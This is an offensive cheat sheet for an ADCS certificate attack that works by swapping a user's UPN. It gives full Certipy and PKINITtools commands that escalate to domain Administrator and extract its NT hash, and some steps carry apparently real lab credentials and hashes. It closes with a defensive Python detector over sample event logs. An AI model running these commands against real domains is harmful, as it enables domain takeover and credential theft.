PRIMARY CATEGORY: ADCS

Theory

This attack leverages the absence of the security extension on the CA. Without it, the certificates the CA issues carry no SID binding to the requesting account, so the domain controller maps them to an account purely by the identity fields in the certificate (here, the UPN).

Enumeration

- Certipy (UNIX-Like)

certipy find -dc-ip '<DC_IP>' -username '<USER>' -password '<PASSWD>' -stdout -vulnerable

Abuse

Requirements

In order to accomplish this task, an operator must have control over a domain account which has GenericWrite, GenericAll, WriteDACL or WriteProperty (UPN attribute) on another domain account.

Workflow

Checking the UPN of the Vulnerable User

- Certipy

certipy account -dc-ip '<DC>' -username '<CONTROLLED_ACCOUNT>' -password '<PASSWD>' -user '<VULNERABLE_USER>' read

Updating the Vulnerable User's UPN

- Certipy

certipy account -dc-ip '<DC>' -username '<USER>' -password '<PASSWD>' -user '<VULNERABLE_USER>' -upn '<UPN>' update

Requesting the Certificate from the CA

- Certipy

certipy req -dc-ip 10.129.232.88 -username 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -ca 'fluffy-DC01-CA' -template 'User'

Restoring the Original Value of the UPN Attribute

- Certipy

certipy account -dc-ip 10.129.232.88 -username 'p.agila' -password 'prometheusx-303' -user 'ca_svc' -upn '<ORIGINAL_UPN>' update

<ORIGINAL_UPN> is the value returned by the read step above.

Passing-the-Certificate + UnPAC-the-Hash as the Domain Administrator User

- Certipy

certipy auth -dc-ip 10.129.232.88 -user 'Administrator' -domain 'fluffy.htb' -pfx administrator.pfx

- PKINITtools

python3 gettgtpkinit.py -dc-ip '<DC>' -cert-pfx '<PFX_CERT>' '<DOMAIN>/Administrator' 'Administrator.ccache'
export KRB5CCNAME=$( realpath '<CCACHE_FILE>' )
python3 getnthash.py -dc-ip '<DC>' -key '<AS_KEY>' '<DOMAIN>/Administrator'

<AS_KEY> is the AS-REP encryption key printed by gettgtpkinit.py.
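A defender-side correlation of the workflow above, added here as an example that is not part of the original page or of Certipy: it runs over constructed, simplified security-log records (a 4738 account-change event carrying the new UPN value, and a 4887 certificate-issued event) and flags an account whose UPN was pointed at another principal, then used to obtain a certificate, then put back. The flat record fields are an assumption, a stand-in for parsing the real event XML.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs): a flattened rendering of
# Security event 4738 (account changed; "upn" = new UPN value) and CA event
# 4887 (certificate issued; "upn" = UPN placed in the certificate).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4738, "actor": "p.agila",
     "target": "ca_svc", "upn": "Administrator"},
    {"time": "2024-05-01T10:01:30", "id": 4887, "requester": "FLUFFY\\ca_svc",
     "template": "User", "upn": "Administrator"},
    {"time": "2024-05-01T10:02:10", "id": 4738, "actor": "p.agila",
     "target": "ca_svc", "upn": "ca_svc@fluffy.htb"},
    {"time": "2024-05-01T11:00:00", "id": 4887, "requester": "FLUFFY\\j.doe",
     "template": "User", "upn": "j.doe@fluffy.htb"},
]


def _upn_user(upn):
    """Lower-cased user part of a UPN ('a@dom' -> 'a', 'a' -> 'a')."""
    return upn.split("@", 1)[0].lower()


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_upn_swap(events, window=timedelta(minutes=30)):
    """Flag accounts whose UPN was set to another principal's name and that
    then obtained a certificate carrying that UPN within `window`; also note
    whether the UPN was later put back (the 'restore' step of the workflow)."""
    findings = []
    for chg in events:
        # A new UPN that still names the account itself is rename/suffix noise.
        if chg["id"] != 4738 or _upn_user(chg["upn"]) == chg["target"].lower():
            continue
        for iss in events:
            if iss["id"] != 4887 or not (timedelta(0) <= _ts(iss) - _ts(chg) <= window):
                continue
            requester = iss["requester"].split("\\")[-1].lower()
            if requester != chg["target"].lower() or _upn_user(iss["upn"]) != _upn_user(chg["upn"]):
                continue
            restored = any(e["id"] == 4738 and e["target"] == chg["target"]
                           and _ts(e) > _ts(chg)
                           and _upn_user(e["upn"]) == chg["target"].lower()
                           for e in events)
            findings.append({"account": chg["target"], "impersonated": _upn_user(chg["upn"]),
                             "changed_by": chg["actor"], "cert_time": iss["time"],
                             "restored": restored})
    return findings
```

On a real estate the same rule would consume 4738 from the domain controllers and 4887 from the CA, and a subsequent 4768 for the impersonated account showing certificate pre-authentication is the confirming signal.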